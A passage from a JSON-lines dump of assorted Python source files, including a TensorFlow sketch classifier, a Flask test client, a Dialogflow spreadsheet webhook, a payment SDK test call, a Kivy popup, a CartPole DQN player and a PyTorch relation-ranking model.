pd.DataFrame(index=[0], data=ff, columns=['drus', 'dittf', 'dmy'])\n # df2 = -df1\n # '''\n # print(self.model.predict_proba(ff))\n # p1 = self.model.predict_proba(ff)[0, 1]\n # p2 = p1\n # #p2 = self.model.predict_proba(-ff)[0, 0]\n # print([p1, p2])\n # print(r1)\n # print(r2)\n # if ff[0] != 0 or ff[1] != 0:\n # return format((p1 + p2) / 2 * 100, '.1f') + '%,
    ' + 'ставка на игрока 1 от кф ' + format(1 / p1, '.2f') + ';
    ' + 'ставка на игрока 2 от кф ' + format(1 / (1 - p1), '.2f') + ';'\n return '?'\n","sub_path":"ttstat/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"499004763","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport numpy as np\nimport os\nimport argparse\nimport ast\nimport functools\nimport sys\nimport tensorflow as tf\n\n\ndef my_model_fn(features,labels,mode,params):\n def create_input_model(features,labels):\n shapes=features[\"shape\"]\n ink1=features[\"ink\"]\n length_of_tensors = tf.squeeze(tf.slice(shapes,begin=[0,0],size = [params.batch_size,1]))\n inks=tf.reshape(ink1,[params.batch_size,-1,3])\n if labels is not None:\n labels=tf.squeeze(labels)\n return inks,labels,length_of_tensors\n \n def main_path(inks,lengths):\n #First,get into convolution layer:\n conv=inks\n train = tf.estimator.ModeKeys.TRAIN\n for i in range(len(params.num_conv)):\n convolved_input=conv\n if params.batch_norm:\n conv = tf.layers.batch_normalization(\n conv,training=(mode==train))\n if i > 0 and params.dropout:\n convolved_input = tf.layers.dropout(\n convolved_input,\n rate = params.dropout,\n training=(mode == train)\n )\n convolved = tf.layers.conv1d(\n convolved_input,\n filters=params.num_conv[i],\n kernel_size=params.conv_len[i],\n activation=None,\n strides=1,\n padding=\"same\",\n name=\"conv1d_%d\" % i)\n \n #Second, we make use of a RNN model, continue using the result from CNN\n convolved = tf.transpose(convolved, [1, 0, 2])\n lstm = tf.contrib.cudnn_rnn.CudnnLSTM(\n num_layers=params.num_layers,\n num_units=params.num_nodes,\n dropout=params.dropout if mode == tf.estimator.ModeKeys.TRAIN else 0.0,\n direction=\"bidirectional\")\n outputs, _ = lstm(convolved)\n outputs = tf.transpose(outputs, [1, 0, 2])\n mask = tf.tile(\n tf.expand_dims(tf.sequence_mask(lengths,tf.shape(outputs)[1]),2),\n [1,1,tf.shape(outputs)[2]])\n zero_outside = tf.where(mask, outputs, tf.zeros_like(outputs))\n outputs = tf.reduce_sum(zero_outside, axis=1)\n return outputs\n \n \n inks,length,labels = create_input_model(features,labels)\n state = main_path(inks,length)\n #add a layer of fully connected layer\n logits=tf.layers.dense(state,params.num_classes)\n \n #loss_computing\n cross_entropy = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits)\n )\n #optimizer\n train_op = tf.contrib.layers.optimize_loss(\n loss=cross_entropy,\n global_step=tf.train.get_global_step(),\n learning_rate=params.learning_rate,\n optimizer=\"Adam\",\n clip_gradients=params.gradient_clipping_norm,\n summaries=[\"learning_rate\", \"loss\", \"gradients\", \"gradient_norm\"])\n\n predictions = tf.argmax(logits, axis=1)\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions={\"logits\": logits, \"predictions\": predictions},\n loss=cross_entropy,\n train_op=train_op,\n eval_metric_ops={\"accuracy\": tf.metrics.accuracy(labels, predictions)})\n \n ","sub_path":"model_fn.py","file_name":"model_fn.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"358650428","text":"import os\nimport json\nimport requests\nfrom decouple import config\nfrom flask import Flask, redirect, render_template, request, flash, sessions, url_for\n\napp = Flask(__name__)\napp.secret_key = config('SECRET_KEY')\nBASE_URL 
= 'http://127.0.0.1:8000'\n\n###################### HELPER ############################################################\ndef serve_endpoint(path):\n return BASE_URL + path\n\ndef send_image_req(url,data):\n my_img = {'file': open(data, 'rb')}\n response = requests.post(url, files=my_img)\n return response.json()\n\ndef send_path_req(url, path):\n param = {'rel_path': path}\n response = requests.post(url, json=param)\n return response.json()\n\n##########################################################################################\n################### MAIN ROUTING #########################################################\n############## ONLY FOR TESTING API ######################################################\n##########################################################################################\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/', methods=['POST'])\ndef upload_image():\n if request.method == 'POST':\n file = request.files.get('file')\n data = file.filename\n response = send_image_req(serve_endpoint('/api/upload'),data)\n saved = response['saved']\n recent_upload = serve_endpoint(response['recent_upload'])\n \n if saved:\n flash('Yey image successfully uploaded and predicted. Result shows below')\n return render_template('index.html', recent_upload=recent_upload)\n else: \n flash('Nothing happens so far')\n return render_template(\"index.html\")\n return render_template(\"index.html\", message=\"Your request is not reached\")\n\n@app.route('/predict', methods=['POST'])\ndef predict_img():\n if request.method == 'POST':\n recent_upload = request.form.get('recent_upload')\n base_up = os.path.basename(recent_upload)\n\n response_res = requests.get(serve_endpoint(f'/api/result/opencv/{base_up}')).json()\n response_ext = requests.get(serve_endpoint(f'/api/extract/opencv/{base_up}')).json()\n # response = {response_res, response_ext}\n return redirect(url_for('display', response_res=json.dumps(response_res), \n response_ext=json.dumps(response_ext)))\n \n@app.route('/display')\ndef display():\n messages_res = json.loads(request.args['response_res'])\n messages_ext = json.loads(request.args['response_ext'])\n result_path = serve_endpoint(messages_res['result_path'])\n extract_paths = list(map(BASE_URL.__add__, messages_ext['extract_paths']))\n \n return render_template('display.html', extract_paths=extract_paths, result_path=result_path)\n\n##########################################################################################\n##########################################################################################\n##########################################################################################\n\nif __name__ == \"__main__\":\n app.run(port=5001, debug=True)","sub_path":"apps/testAPI/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"385251722","text":"# Copyright 2021 MosaicML. 
All Rights Reserved.\n\nfrom dataclasses import dataclass\n\nimport yahp as hp\nfrom torchvision import transforms\nfrom torchvision.datasets import CIFAR10\n\nfrom composer.datasets.hparams import DataloaderSpec, DatasetHparams\n\n\n@dataclass\nclass CIFAR10DatasetHparams(DatasetHparams):\n \"\"\"Defines an instance of the CIFAR-10 dataset for image classification.\n \n Parameters:\n is_train (bool): Whether to load the training or validation dataset.\n datadir (str): Data directory to use.\n download (bool): Whether to download the dataset, if needed.\n drop_last (bool): Whether to drop the last samples for the last batch.\n shuffle (bool): Whether to shuffle the dataset for each epoch.\n \"\"\"\n\n is_train: bool = hp.required(\"whether to load the training or validation dataset\")\n datadir: str = hp.required(\"data directory\")\n download: bool = hp.required(\"whether to download the dataset, if needed\")\n drop_last: bool = hp.optional(\"Whether to drop the last samples for the last batch\", default=True)\n shuffle: bool = hp.optional(\"Whether to shuffle the dataset for each epoch\", default=True)\n\n def initialize_object(self) -> DataloaderSpec:\n cifar10_mean, cifar10_std = [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261]\n datadir = self.datadir\n\n if self.is_train:\n transformation = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar10_mean, std=cifar10_std),\n ])\n else:\n transformation = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar10_mean, std=cifar10_std),\n ])\n\n return DataloaderSpec(\n dataset=CIFAR10(\n datadir,\n train=self.is_train,\n download=self.download,\n transform=transformation,\n ),\n drop_last=self.drop_last,\n shuffle=self.shuffle,\n )\n","sub_path":"composer/datasets/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384869130","text":"from app import db\nfrom app.api.helpers import Service\nfrom app.models import (Supplier, Domain, SupplierDomain, Assessment)\n\n\nclass SupplierDomainService(Service):\n __model__ = SupplierDomain\n\n def __init__(self, *args, **kwargs):\n super(SupplierDomainService, self).__init__(*args, **kwargs)\n\n def get_supplier_domains(self, supplier_code):\n result = (\n db\n .session\n .query(\n SupplierDomain.id,\n SupplierDomain.status,\n Domain.name.label('service'),\n Domain.id.label('service_id'),\n Assessment.active.label('active_assessment')\n )\n .join(Supplier)\n .join(Domain)\n .outerjoin(Assessment)\n .filter(Supplier.code == supplier_code)\n .order_by(Domain.name)\n .all()\n )\n\n return [r._asdict() for r in result]\n\n def set_supplier_domain_status(self, supplier_id, domain_id, status, price_status, do_commit=True):\n existing = self.filter(\n SupplierDomain.domain_id == domain_id,\n SupplierDomain.supplier_id == supplier_id\n ).one_or_none()\n if existing:\n existing.status = status\n existing.price_status = price_status\n return self.save(existing, do_commit)\n else:\n supplier_domain = SupplierDomain(\n domain_id=domain_id,\n supplier_id=supplier_id,\n status=status,\n price_status=price_status\n )\n return self.save(supplier_domain, 
do_commit)\n","sub_path":"app/api/services/supplier_domain.py","file_name":"supplier_domain.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640929488","text":"# -*- coding: utf-8 -*-\nfrom django.http import JsonResponse, HttpRequest \nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport gspread\nimport oauth2client.client\nimport os\n\n\ndef get_request_num(request):\n \"\"\"dialogflowからのrequestから必要な件数を抽出する\"\"\"\n # requestをデコードしてその文字列をjsonの辞書型に変換\n req = json.loads(request.body.decode('utf-8'))\n \n # 何も指定がなければ直近の1件のみを返す\n line_num = 1\n # requestから'number'または'request_nums'の存在する方を取得する\n params = req['result']['parameters']\n if 'request_nums' in params.keys():\n request_nums = params['request_nums']\n if request_nums != '':\n line_num = int(request_nums)\n if 'number' in params.keys():\n number = params['number']\n if number != '':\n line_num = int(number)\n\n return line_num\n\n\ndef get_gc_client():\n \"\"\"\n GoogleSpreadSheet client を取得する\n ref: http://gspread.readthedocs.io/en/latest/#gspread.authorize\n \"\"\"\n scope = ['https://spreadsheets.google.com/feeds']\n client_email = os.environ['CLIENT_EMAIL']\n private_key = os.environ['PRIVATE_KEY'].replace('\\\\n', '\\n').encode('utf-8')\n credentials = oauth2client.client.SignedJwtAssertionCredentials(client_email, private_key, scope)\n gc = gspread.authorize(credentials)\n\n return gc\n\n\ndef get_gc_value(gc, line_num):\n \"\"\"\n GoogleSpreadSheetからデータを取得して指定の件数返す\n \"\"\"\n ss = gc.open(\"memorandum\")\n sh = ss.worksheet(\"memo1\")\n values = sh.get_all_values()\n \n # 指定された数字がシートの件数を超えていたらシートの最大件数を設定\n if int(line_num) >= len(values):\n line_num = len(values)\n\n ret_vals = ''\n for i in range(1, line_num + 1):\n # シートの最新の行から順に返す\n # 3要素目がメモの本文\n ret_vals += str(values[len(values) - i][2])\n # 次の項目の前に空白を入れる\n ret_vals += '。 '\n\n return ret_vals\n\n\n@csrf_exempt\ndef index(request):\n\n # requestから必要な件数を抽出\n line_num = get_request_num(request)\n # GoogleSpreadSheet client を取得\n gc = get_gc_client()\n # GoogleSpreadSheet から必要な件数だけデータを取得\n sheet_messages = get_gc_value(gc, line_num)\n res = {\n \"speech\": sheet_messages,\n \"displayText\": sheet_messages,\n #\"data\": {\"kik\": {}},\n #\"contextOut\": [{\"name\":\"weather\", \"lifespan\":2, \"parameters\":{\"city\":\"Rome\"}}],\n \"source\": \"spreadsheet memorandum\"\n }\n return JsonResponse(res)\n","sub_path":"memorandum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"429985361","text":"# -*- coding: utf-8 -*-\n\nfrom nps.errors import RejectedException, DeclinedException\nfrom nps.nps_sdk import NpsSDK\nfrom suds import TypeNotFound\n\n#try:\nsdk = NpsSDK()\n\nparams = {\n \"psp_Version\": '2.2',\n \"psp_MerchantId\": 'psp_test',\n \"psp_TxSource\": 'WEB',\n \"psp_MerchTxRef\": 'OsDER61466-3',\n \"psp_MerchOrderId\": 'OsDER61466',\n \"psp_Amount\": 15050,\n \"psp_NumPayments\": 1,\n \"psp_Currency\": '032',\n \"psp_Country\": 'ARG',\n \"psp_Product\": 14,\n \"psp_CardNumber\": 4507990000000010,\n \"psp_CardExpDate\": 1612,\n \"psp_PosDateTime\": '2016-12-01 12:00:00'\n}\n\nresp = sdk.PayOnLine_2p(params)\n\nprint (resp)\n\"\"\"\nexcept DeclinedException as e:\n print (e.get_extended_message())\nexcept RejectedException as e:\n print (e.get_extended_message())\nexcept TypeNotFound as e:\n print 
(e.message)\n\n\"\"\"","sub_path":"casosTester.py","file_name":"casosTester.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161228905","text":"# https://www.coursera.org/learn/python-osnovy-programmirovaniya/programming/g7wXJ/sosiedi-odnogho-znaka/submission\r\n\r\n# Возрастает ли список?\r\n\r\n# Дан список. Определите, является ли он монотонно возрастающим(то есть верно\r\n# ли, что каждый элемент этого списка больше предыдущего).Выведите YES, если\r\n# массив монотонно возрастает и NO в противном случае.Решение оформите в виде\r\n# функции IsAscending(A).В данной функции должен быть один цикл while, не\r\n# содержащий вложенных условий и циклов — используйте схему линейного поиска.\r\n\r\n\r\ndef IsAscending(list):\r\n k = 1\r\n while k < len(list) and list[k - 1] < list[k]:\r\n k += 1\r\n return len(list) == k\r\n\r\n\r\ndef PrintAnswer(truth, answers=('YES', 'NO')):\r\n if truth:\r\n print(answers[0])\r\n else:\r\n print(answers[1])\r\n\r\n\r\ndata = tuple(map(int, input().split()))\r\n\r\nPrintAnswer(IsAscending(data))\r\n","sub_path":"5/5-18.py","file_name":"5-18.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622281048","text":"'''\r\n a simple Yes/No Popup\r\n LICENSE : MIT\r\n'''\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.properties import StringProperty\r\n\r\nfrom kivy.lang.builder import Builder\r\nBuilder.load_string('''\r\n#\r\n:\r\n FloatLayout:\r\n Label:\r\n size_hint: 0.8, 0.6\r\n pos_hint: {'x': 0.1, 'y':0.4}\r\n text: root.message\r\n\r\n Button:\r\n size_hint: 0.4, 0.35\r\n pos_hint: {'x':0.1, 'y':0.05}\r\n text: 'Yes'\r\n on_release: root.dispatch('on_yes')\r\n \r\n Button:\r\n size_hint: 0.4, 0.35\r\n pos_hint: {'x':0.5, 'y':0.05}\r\n text: 'No'\r\n on_release: root.dispatch('on_no')\r\n\r\n#\r\n''')\r\n\r\nclass YesNoPopup(Popup):\r\n __events__ = ('on_yes', 'on_no')\r\n\r\n message = StringProperty('')\r\n\r\n def __init__(self, **kwargs) -> None:\r\n super(YesNoPopup, self).__init__(**kwargs)\r\n self.auto_dismiss = False\r\n \r\n def on_yes(self):\r\n pass\r\n \r\n def on_no(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n from kivy.app import App\r\n from kivy.uix.boxlayout import BoxLayout\r\n from kivy.uix.button import Button\r\n \r\n class TestApp(App):\r\n def __init__(self, **kwargs):\r\n super(TestApp, self).__init__(**kwargs)\r\n \r\n def build(self):\r\n self.pop = pop = YesNoPopup(\r\n title='Popup !',\r\n message='OK ?',\r\n size_hint=(0.4, 0.3),\r\n pos_hint={'x':0.3, 'y':0.35}\r\n )\r\n pop.bind(\r\n on_yes=self._popup_yes,\r\n on_no=self._popup_no\r\n )\r\n root = BoxLayout()\r\n btn = Button(text='open')\r\n root.add_widget(btn)\r\n btn.bind(on_release=lambda btn: self.pop.open())\r\n return root\r\n\r\n def _popup_yes(self, instance):\r\n print(f'{instance} on_yes')\r\n self.pop.dismiss()\r\n\r\n def _popup_no(self, instance):\r\n print(f'{instance} on_no')\r\n self.pop.dismiss()\r\n\r\n \r\n TestApp().run()\r\n ","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"315634501","text":"# Object: Create a function that takes two strings as arguments and return either True or False depending on whether the total number of characters in the first string is equal to the total number of 
characters in the second string.\n\ndef chk(a,b):\n attempt = False\n if len(a) == len(b):\n attempt = True\n return attempt\n\na = input(\"Enter input 1: \")\nb = input(\"Enter input 2: \")\nprint(chk(a,b))","sub_path":"strlen.py","file_name":"strlen.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647951611","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport gym\nimport itertools\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport time\n\n\n# Creation of the environment\nenv = gym.make(\"CartPole-v1\")\nn_actions = env.action_space.n\nn_state_variables = len(env.observation_space.sample())\n\n################################################################################################################################\n# Define the architecture of the Neural Network\nclass QNet(nn.Module): \n \n def __init__(self):\n super(QNet, self).__init__()\n self.fc1 = nn.Linear(n_state_variables, 256)\n self.fc2 = nn.Linear(256, n_actions)\n \n def forward(self, input):\n x = self.fc1(input)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n################################################################################################################################\n# Instantiate the network and load the pretrained weights\nnn = QNet()\nPATH = \"./dqn_weights.pytorch\"\nnn.load_state_dict(torch.load(PATH))\n\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport time\nimport itertools\n\nstate = env.reset()\nimg = plt.imshow(env.render(mode='rgb_array')) # only call this once\nfor timestep in itertools.count():\n img.set_data(env.render(mode='rgb_array')) # just update the data\n display.display(plt.gcf())\n display.clear_output(wait=True)\n action = torch.argmax(nn.forward(torch.FloatTensor(state))).item()\n # action = env.action_space.sample() # Illustrating how it is to play at randome\n next_state, reward, done, info =env.step(action) \n time.sleep(0.01)\n if done:\n print(\"The duration of the episode/game is : {} timestemps.\".format(timestep+1))\n break\n else:\n state = next_state\nplt.clf()\nplt.close(\"all\")\nenv.close() ","sub_path":"RL/dqn_usage.py","file_name":"dqn_usage.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78095165","text":"# coding=utf-8\nfrom __future__ import absolute_import\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport numpy as np\nimport sys\nimport numpy as np\n#import matplotlib.pyplot as plt\n#plt.switch_backend('agg')\nimport os\nimport sys\nimport json\nimport re\nimport shutil\nimport json\nimport datetime\n#from PIL import Image\n#from PIL import ImageFont, ImageDraw\nsys.path.append(\"..\")\nimport utils.data_provider as data_provider\nfrom utils.data_provider import VQADataProvider\nimport config\n\nopt = config.parse_opt()\nclass RankingLoss(nn.Module):\n def __init__(self, vec_size=opt.BATCH_SIZE, margin=0.75):\n super(RankingLoss, self).__init__()\n self.vec_size = vec_size\n self.margin = margin\n return \n \n # def forward(self, mix, rela_right1, rela_false1, rela_right2, rela_false2, rela_right3, rela_false3, margin=0.75):\n def forward(self, mix, rela_right1, rela_false1,margin=0.75): \n # right_item = 
F.cosine_similarity(mix, rela_right)\n # false_item = F.cosine_similarity(mix, rela_false)\n #self.vec_size = rela_right.shape[0]\n zero1 = torch.zeros(self.vec_size)\n zero1 = Variable(zero1.cuda())\n margin_vec1 = torch.cuda.FloatTensor(self.vec_size)\n margin_vec1.fill_(self.margin)\n margin_vec1 = Variable(margin_vec1)\n #print (right_item.shape)\n margin_vec1 = margin_vec1.sub_(rela_right1)\n loss = torch.max(zero1, margin_vec1.add_(rela_false1))\n '''\n zero2 = torch.zeros(self.vec_size)\n zero2 = Variable(zero2.cuda())\n margin_vec2 = torch.cuda.FloatTensor(self.vec_size)\n margin_vec2.fill_(self.margin)\n margin_vec2 = Variable(margin_vec2)\n #print (right_item.shape)\n margin_vec2 = margin_vec2.sub_(rela_right2)\n loss2 = torch.max(zero2, margin_vec2.add_(rela_false2))\n\n zero3 = torch.zeros(self.vec_size)\n zero3 = Variable(zero3.cuda())\n margin_vec3 = torch.cuda.FloatTensor(self.vec_size)\n margin_vec3.fill_(self.margin)\n margin_vec3 = Variable(margin_vec3)\n #print (right_item.shape)\n margin_vec3 = margin_vec3.sub_(rela_right3)\n loss3 = torch.max(zero3, margin_vec3.add_(rela_false3))\n #print (loss.shape)\n loss = torch.add(loss1, loss2)\n loss = torch.add(loss, loss3)\n loss = torch.div(loss, 3)\n '''\n loss = torch.mean(loss)\n return loss\n\nclass mfh_baseline(nn.Module):\n def __init__(self, opt):\n super(mfh_baseline, self).__init__()\n self.opt = opt\n self.JOINT_EMB_SIZE = 2*opt.LSTM_UNIT_NUM\n # self.Embedding1 = nn.Embedding(opt.quest_vob_size, 300)\n # self.Embedding2 = nn.Embedding(opt.rela_vob_size, 300)\n self.LSTM1 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.LSTM2 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.LSTM3 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.LSTM4 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.linear = nn.Linear(1, 1, bias=True)\n \n \n def forward(self, data, data_glove, rb_vec, rb_glove, wrb_vec, wrb_glove, rc_vec, rc_glove, wrc_vec, wrc_glove, mode):\n ## def forward(self, data, data_glove, s_vec, s_glove, mode):\n if mode == 'val' or mode == 'test' :\n self.batch_size = self.opt.VAL_BATCH_SIZE\n else:\n self.batch_size = self.opt.BATCH_SIZE\n # data = torch.transpose(data, 1, 0).long()\n #print (data.shape) # 33*1\n \n data_glove = data_glove.permute(1, 0, 2)\n #print (data_glove.shape) # 33*1*300\n # data = F.tanh(self.Embedding1(data))\n #print (data.shape) # 33*1*300\n # data = torch.cat((data, data_glove) , 2) # 33 * batch * 600\n #print (data.shape) #33*1*600\n data_1_lstm, _ = self.LSTM1(data_glove)\n #H_q = self.relu(data_1_lstm)\n ## H_q = H_q.permute(1,0,2) # batch * seq_len * 1024\n qb_feat, _= torch.max(data_1_lstm, 0)\n data_2_lstm, _ = self.LSTM2(data_glove)\n qc_feat, _= torch.max(data_2_lstm, 0)\n\n\n # rb = rb_vec\n bglove = rb_glove\n bglove = bglove.permute(1, 0, 2)\n # rb = torch.transpose(rb, 1, 0).long()\n # rb = F.tanh(self.Embedding2(rb))\n # rb = torch.cat((rb, bglove), 2) # 17*batch*600\n rb_feat, _ = self.LSTM3(bglove)\n rb_feat, _ = torch.max(rb_feat, 0)\n\n # rc = rc_vec\n cglove = rc_glove\n cglove = cglove.permute(1, 0, 2)\n # rc = torch.transpose(rc, 1, 0).long()\n # rc = F.tanh(self.Embedding2(rc))\n # rc = torch.cat((rc, cglove), 2) # 17*batch*600\n rc_feat, _ = self.LSTM4(cglove)\n rc_feat, _ = torch.max(rc_feat, 0)\n\n ab 
= self.linear(qb_feat.mul(rb_feat).sum(1).unsqueeze(1))\n ac = self.linear(qc_feat.mul(rc_feat).sum(1).unsqueeze(1))\n\n rb_feat = ab * rb_feat\n rc_feat = ac * rc_feat\n\n rb_score = F.cosine_similarity(qb_feat, rb_feat)\n rc_score = F.cosine_similarity(qc_feat, rc_feat)\n # print(rb_score.shape)\n \n # t_score = F.cosine_similarity(q_feat, t_feat)\n # r_score = r_score.view(-1, 1)\n # t_score = t_score.view(-1, 1)\n \n final_score = rb_score+rc_score\n # print(final_score.shape)\n # wrb = wrb_vec\n wbglove = wrb_glove\n wbglove = wbglove.permute(1, 0, 2)\n # wrb = torch.transpose(wrb, 1, 0).long()\n # wrb = F.tanh(self.Embedding2(wrb))\n # wrb = torch.cat((wrb, wbglove), 2) # 17*batch*600\n wrb_feat, _ = self.LSTM3(wbglove)\n wrb_feat, _ = torch.max(wrb_feat, 0)\n \n # wrc = wrc_vec\n wcglove = wrc_glove\n wcglove = wcglove.permute(1, 0, 2)\n # wrc = torch.transpose(wrc, 1, 0).long()\n # wrc = F.tanh(self.Embedding2(wrc))\n # wrc = torch.cat((wrc, wcglove), 2) # 17*batch*600\n wrc_feat, _ = self.LSTM4(wcglove)\n wrc_feat, _ = torch.max(wrc_feat, 0)\n \n\n wab = self.linear(qb_feat.mul(wrb_feat).sum(1).unsqueeze(1))\n wac = self.linear(qc_feat.mul(wrc_feat).sum(1).unsqueeze(1))\n\n wrb_feat = wab * wrb_feat\n wrc_feat = wac * wrc_feat\n\n wrb_score = F.cosine_similarity(qb_feat, wrb_feat)\n wrc_score = F.cosine_similarity(qc_feat, wrc_feat)\n \n wfinal_score = wrb_score + wrc_score\n # wfinal_score = torch.sigmoid(wr_score)\n \n return 1, final_score, wfinal_score\n \ndef adjust_learning_rate(optimizer, decay_rate):\n for param_group in optimizer.param_groups:\n param_group['lr'] = param_group['lr'] * decay_rate\n \ndef train(opt, folder):\n train_Data = data_provider.VQADataset(opt.TRAIN_DATA_SPLITS, opt.BATCH_SIZE, folder, opt)\n #train_Data.__getitem__(0)\n #train_Data.__getitem__(1)\n print ('---------------------------train_dataset loads sucessfully !--------------------------------------')\n #train_Loader = torch.utils.data.DataLoader(dataset=train_Data,batch_size=1, shuffle=True, pin_memory=True, num_workers=1)\n #print train_Loader\n model = mfh_baseline(opt)\n model.cuda()\n optimizer = optim.Adam(model.parameters(), lr = opt.INIT_LEARNING_RATE)\n torch.cuda.set_device(opt.TRAIN_GPU_ID)\n criterion = RankingLoss()\n train_loss = np.zeros(opt.MAX_ITERATIONS + 1)\n results = []\n\n for iter_idx, (data, glove_data, rb, rb_glove, rb_false, frb_glove, rc, rc_glove, rc_false, frc_glove, epoch) in enumerate(train_Data):\n model.train()\n # 将以上的 torch类型变量转为np类型,并将维度值为1的维度删去\n # iter_idx += 1\n data = torch.from_numpy(data)\n glove_data = torch.from_numpy(glove_data)\n \n\n # rb = torch.from_numpy(rb)\n rb_glove = torch.from_numpy(rb_glove)\n # rb_false = torch.from_numpy(rb_false) \n \n \n # rc = torch.from_numpy(rc)\n rc_glove = torch.from_numpy(rc_glove)\n # rc_false = torch.from_numpy(rc_false)\n fb1, fb2, fb3 = frb_glove\n fc1, fc2, fc3 = frc_glove\n\n frb_glove1 = torch.from_numpy(fb1)\n frc_glove1 = torch.from_numpy(fc1)\n # frb_glove2 = torch.from_numpy(fb2)\n # frc_glove2 = torch.from_numpy(fc2)\n # frb_glove3 = torch.from_numpy(fb3)\n # frc_glove3 = torch.from_numpy(fc3)\n \n np.int(epoch)\n\n # 将需要传入网络的张量用Variable包装起来,为传入网络计算模块做准备,并使用cuda加速运算\n # data = Variable(data).cuda().long()\n glove_data = Variable(glove_data).cuda().float()\n # glove_data2 = glove_data.clone()\n # glove_data3 = glove_data.clone()\n \n # rb = Variable(rb).cuda().float()\n rb_glove = Variable(rb_glove).cuda().float()\n # rb_false = Variable(rb_false).cuda().float()\n # rb_glove2 = rb_glove.clone()\n # 
rb_glove3 = rb_glove.clone()\n # rc = Variable(rc).cuda().float()\n rc_glove = Variable(rc_glove).cuda().float()\n # rc_glove2 = rc_glove.clone()\n # rc_glove3 = rc_glove.clone()\n # rc_false = Variable(rc_false).cuda().float()\n frb_glove1 = Variable(frb_glove1).cuda().float()\n frc_glove1 = Variable(frc_glove1).cuda().float()\n ''' \n frb_glove2 = Variable(frb_glove2).cuda().float()\n frc_glove2 = Variable(frc_glove2).cuda().float()\n frb_glove3 = Variable(frb_glove3).cuda().float()\n frc_glove3 = Variable(frc_glove3).cuda().float()\n '''\n # 将优化器初始化,并将数据传入网络计算模块中进行计算,得到预测分类类别的概率向量pred: opt.BATCH_SIZE * 3000维的向量\n # forward pass : compute predicted y by passing x to the model\n optimizer.zero_grad()\n pred, right_score1, wrong_score1 = model(0, glove_data, 0, rb_glove, 0, frb_glove1, 0, rc_glove, 0, frc_glove1, 'train')\n # pred, right_score2, wrong_score2 = model(0, glove_data2, 0, rb_glove2, 0, frb_glove2, 0, rc_glove2, 0, frc_glove2, 'train')\n # pred, right_score3, wrong_score3 = model(0, glove_data3, 0, rb_glove3, 0, frb_glove3, 0, rc_glove3, 0, frc_glove3, 'train')\n \n # right = torch.mean(right_score3)\n # right.backward()\n # print (right_score)\n # print right_score.shape, wrong_score.shape\n # rela_right = model.get_LSTM_vec(relation, r_glove)\n # rela_false = model.get_LSTM_vec(relation_false, fr_glove)\n # compute loss 计算损失\n loss = criterion(pred, right_score1, wrong_score1)\n \n\n # perform a backward pass and update the weights 反向传播并更新权重\n loss.backward()\n optimizer.step()\n\n # 以下都是输出和保存迭代中的信息\n train_loss[iter_idx] = loss.data.item()\n\n if iter_idx % opt.DECAY_STEPS== 0 and iter_idx != 0:\n adjust_learning_rate(optimizer, opt.DECAY_RATE)\n if iter_idx % opt.PRINT_INTERVAL == 0 and iter_idx != 0:\n now = str(datetime.datetime.now())\n c_mean_loss = train_loss[iter_idx - opt.PRINT_INTERVAL:iter_idx].mean()/opt.BATCH_SIZE\n # writer.add_scalar('mfh_baseline_glove/train_loss', c_mean_loss, iter_idx)\n # writer.add_scalar('mfh_baseline_glove/lr', optimizer.param_groups[0]['lr'], iter_idx)\n print('{}\\tTrain Epoch : {}\\tIter: {}\\tLoss: {:.12f}'.format(now, epoch, iter_idx, c_mean_loss))\n if 